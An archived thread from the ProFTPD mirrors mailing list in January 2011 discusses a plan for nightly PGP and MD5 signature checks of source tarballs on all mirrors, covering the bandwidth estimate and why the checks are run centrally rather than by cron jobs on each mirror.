Re: [Proftpd-mirrors] Coming soon: ProFTPD mirror nightly signature verification

2011-01-13 Thread John Morrissey 
On Sun, Jan 02, 2011 at 02:52:29AM +0200, Marian Marinov wrote:
> On Sunday 02 January 2011 02:20:13 John Morrissey wrote:
> > On Sat, Jan 01, 2011 at 06:46:26PM -0500, John Morrissey wrote:
> > > Starting on about 12 January, we will be automatically verifying the
> > > PGP and MD5 signatures for current source tarballs (those in
> > > distrib/source) on all mirrors. Based on the count and size of current
> > > releases, this will cause an additional 350-400 gbytes of monthly
> > > traffic for each mirror.
> > 
> > My calculations were way off somehow; this figure should be about
> > *5 to 6* gbytes/month per mirror.
> 
> I'm sorry but, isn't it better to have every mirror calc its MD5 sums
> every day and the main mirror keepd the TRUE signatures up to date and
> secure?

We considered this, but if we're trying to detect whether a mirror has been
compromised, what's to keep the attacker from modifying the cron job that
does this signature verification? Also, we'd need to have all 30+ mirrors
agree to run the extra code to do this. Some may not have (or want to have)
the necessary dependencies installed, or may have wildly different versions
available. And we would need to coordinate updates to this (albeit simple)
job when the inevitable changes or bug fixes occur.

I hear your point, but all in all, the best way to achieve this goal is to
have a separate party from the mirror host perform signature verification.

> I'm not a mirror maintainer, but to me, it seams useless to download and
> verify every mirror remotely. I belive that every mirror maintainer will
> agree to put some very basic cron job which will download the current
> signatures and verify all packages from those signature. And it will quite
> faster.

Some software ecosystems have built-in signature verification for software
downloads. Debian's APT comes to mind; it verifies a PGP chain of trust to
ensure downloaded files are unmodified. ProFTPD source code downloads aren't
part of a larger ecosystem like that, so we have no way to guarantee that
signature verification happens when a download occurs.

Even though it wasn't a ProFTPD mirror that was compromised, we evaluated
our distribution infrastructure and decided that we should be providing this
assurance since ProFTPD mirrors are official download locations.

john
-- 
John Morrissey   _o/\   __o
j...@proftpd.org   _-< \_  /  \     <  \,
www.proftpd.org/   __(_)/_(_)/\___(_) /_(_)__


--
Protect Your Site and Customers from Malware Attacks
Learn about various malware tactics and how to avoid them. Understand 
malware threats, the impact they can have on your business, and how you 
can protect your company and customers by using code signing.
http://p.sf.net/sfu/oracle-sfdevnl
___
ProFTPD Mirror Sites List 
https://lists.sourceforge.net/lists/listinfo/proftp-mirrors

Re: [Proftpd-mirrors] Coming soon: ProFTPD mirror nightly signature verification

2011-01-03 Thread Marian Marinov 
On Sunday 02 January 2011 02:20:13 John Morrissey wrote:
> On Sat, Jan 01, 2011 at 06:46:26PM -0500, John Morrissey wrote:
> > Starting on about 12 January, we will be automatically verifying the PGP
> > and MD5 signatures for current source tarballs (those in distrib/source)
> > on all mirrors. Based on the count and size of current releases, this
> > will cause an additional 350-400 gbytes of monthly traffic for each
> > mirror.
> 
> My calculations were way off somehow; this figure should be about
> *5 to 6* gbytes/month per mirror.
> 
> john

I'm sorry but, isn't it better to have every mirror calc its MD5 sums every 
day and the main mirror keepd the TRUE signatures up to date and secure?

I'm not a mirror maintainer, but to me, it seams useless to download and 
verify every mirror remotely. I belive that every mirror maintainer will agree 
to put some very basic cron job which will download the current signatures and 
verify all packages from those signature. And it will quite faster.

Best regards,
Marian Marinov


signature.asc
Description: This is a digitally signed message part.
--
Learn how Oracle Real Application Clusters (RAC) One Node allows customers
to consolidate database storage, standardize their database environment, and, 
should the need arise, upgrade to a full multi-node Oracle RAC database 
without downtime or disruption
http://p.sf.net/sfu/oracle-sfdevnl___
ProFTPD Mirror Sites List 
https://lists.sourceforge.net/lists/listinfo/proftp-mirrors

Re: [Proftpd-mirrors] Coming soon: ProFTPD mirror nightly signature verification

2011-01-01 Thread John Morrissey 
On Sat, Jan 01, 2011 at 06:46:26PM -0500, John Morrissey wrote:
> Starting on about 12 January, we will be automatically verifying the PGP
> and MD5 signatures for current source tarballs (those in distrib/source)
> on all mirrors. Based on the count and size of current releases, this will
> cause an additional 350-400 gbytes of monthly traffic for each mirror.

My calculations were way off somehow; this figure should be about
*5 to 6* gbytes/month per mirror.

john
-- 
John Morrissey   _o/\   __o
j...@proftpd.org   _-< \_  /  \     <  \,
www.proftpd.org/   __(_)/_(_)/\___(_) /_(_)__


--
Learn how Oracle Real Application Clusters (RAC) One Node allows customers
to consolidate database storage, standardize their database environment, and, 
should the need arise, upgrade to a full multi-node Oracle RAC database 
without downtime or disruption
http://p.sf.net/sfu/oracle-sfdevnl
___
ProFTPD Mirror Sites List 
https://lists.sourceforge.net/lists/listinfo/proftp-mirrors